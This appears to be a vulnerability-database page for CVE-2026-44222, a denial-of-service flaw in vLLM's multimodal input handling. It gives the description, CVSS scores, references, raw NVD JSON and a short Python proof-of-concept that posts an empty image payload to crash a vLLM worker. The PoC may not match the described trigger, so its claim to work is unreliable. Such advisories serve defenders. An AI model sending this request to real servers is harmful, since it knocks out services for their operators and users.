CVE-2026-44222

Description

vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vLLM 0.6.1 至 0.20.0 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (Example)
url = "http://target-vllm-instance:8000/v1/chat/completions"

# Malicious payload containing an image placeholder without actual image data
# This attempts to trigger the IndexError in the multimodal processing path
payload = {
    "model": "meta-llama/Llama-2-7b-chat-hf",
    "messages": [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": "Analyze this image:"},
                # Sending an image type with empty/missing data to trigger the bug
                {"type": "image_url", "image_url": {"url": "data:image/jpeg;base64,"}} 
            ]
        }
    ],
    "max_tokens": 50
}

try:
    response = requests.post(url, headers={"Content-Type": "application/json"}, data=json.dumps(payload))
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44222/
[4] VulDB https://vuldb.com/cve/CVE-2026-44222
[5] https://github.com/vllm-project/vllm/issues/32656
[6] https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.160", "lastModified": "2026-05-12T20:16:43.160", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/issues/32656", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f", "source": "[email protected]"}]}}